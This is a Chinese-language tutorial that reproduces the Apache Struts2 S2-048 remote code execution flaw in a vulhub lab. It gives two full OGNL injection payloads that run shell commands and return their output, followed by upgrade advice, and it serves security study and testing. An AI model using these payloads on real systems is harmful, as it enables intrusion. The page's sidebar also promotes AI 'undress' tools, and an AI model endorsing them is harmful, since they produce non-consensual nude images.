0x00簡介
#Struts2框架是用於開發Java EE網路應用程式的開放原始碼網頁應用程式架構。它利用並延伸了Java Servlet API,鼓勵開發者採用MVC架構。 Struts2以WebWork優秀的設計思想為核心,吸收了Struts框架的部分優點,提供了一個更整潔的MVC設計模式實現的Web應用程式框架。
0x01漏洞概述
Apache Struts2 2.3.x 系列啟用了struts2-struts1-plugin 插件並且存在struts2-showcase 目錄,其漏洞成因是當ActionMessage接收客戶可控的參數資料時,由於後續資料拼接傳遞後處理不當導致任意程式碼執行
0x02影響範圍
Apache Struts 2.3.x系列中啟用了struts2 -struts1-plugin插件的版本。
0x03環境建置
1.自行搭建Apache Struts2較為複雜,本次漏洞環境使用vulhub中的docker環境建置。
下載網址:https://github.com/vulhub/vulhub
#2.下載完成後解壓縮進入s2-048目錄,啟動漏洞環境
#cd cd vulhub -master/struts2/s2-048/ //進入目錄
#docker-compose up -d //啟動靶場
3.使用docker ps 查看是否啟動成功
#4.在瀏覽器中輸入http:your-ip:8080/hello.action,看到以下頁面環境建置完成
0x04漏洞複現
1. 在瀏覽器輸入下列連結存取漏洞頁面
# http://192.168.3.160:8080/integration/saveGangster.action
2.在第一個表單「Gangster Name」處輸入${1+1},下面隨意輸入,點選submit提交查看執行了OGNL 表達式
#2. 在Gangster Name」處把${1+1 }修改為下列指令執行的payload語句
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[' com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames(). (#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@ getRuntime().exec('id').getInputStream())).(#q)}
3. 也可以使用Burp抓包修改成指令執行的payload的語句
註:payload需要使用URL編碼
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?( #_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class )).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id') .(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe', '/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream( true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io. IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
4. 可以使用自動化腳本或圖形化工具實現,這裡不做簡報。
工具可在GitHub上搜尋下載
0x05修復建議
1. 升級 建議升級至最新版本
#2、根據業務狀況,停用關閉(刪除) \struts-2.3.x\apps\struts2-showcase.war套件
以上是怎麼進行Apache Struts2--048遠端程式碼執行漏洞復現的詳細內容。更多資訊請關注PHP中文網其他相關文章!
熱AI工具
Undresser.AI Undress
人工智慧驅動的應用程序,用於創建逼真的裸體照片
AI Clothes Remover
用於從照片中去除衣服的線上人工智慧工具。
Undress AI Tool
免費脫衣圖片
Clothoff.io
AI脫衣器
AI Hentai Generator
免費產生 AI 無盡。
熱門文章
熱工具
SublimeText3 Linux新版
SublimeText3 Linux最新版
DVWA
Damn Vulnerable Web App (DVWA) 是一個PHP/MySQL的Web應用程序,非常容易受到攻擊。它的主要目標是成為安全專業人員在合法環境中測試自己的技能和工具的輔助工具,幫助Web開發人員更好地理解保護網路應用程式的過程,並幫助教師/學生在課堂環境中教授/學習Web應用程式安全性。 DVWA的目標是透過簡單直接的介面練習一些最常見的Web漏洞,難度各不相同。請注意,該軟體中
ZendStudio 13.5.1 Mac
強大的PHP整合開發環境
SecLists
SecLists是最終安全測試人員的伙伴。它是一個包含各種類型清單的集合,這些清單在安全評估過程中經常使用,而且都在一個地方。 SecLists透過方便地提供安全測試人員可能需要的所有列表,幫助提高安全測試的效率和生產力。清單類型包括使用者名稱、密碼、URL、模糊測試有效載荷、敏感資料模式、Web shell等等。測試人員只需將此儲存庫拉到新的測試機上,他就可以存取所需的每種類型的清單。
SublimeText3漢化版
中文版,非常好用
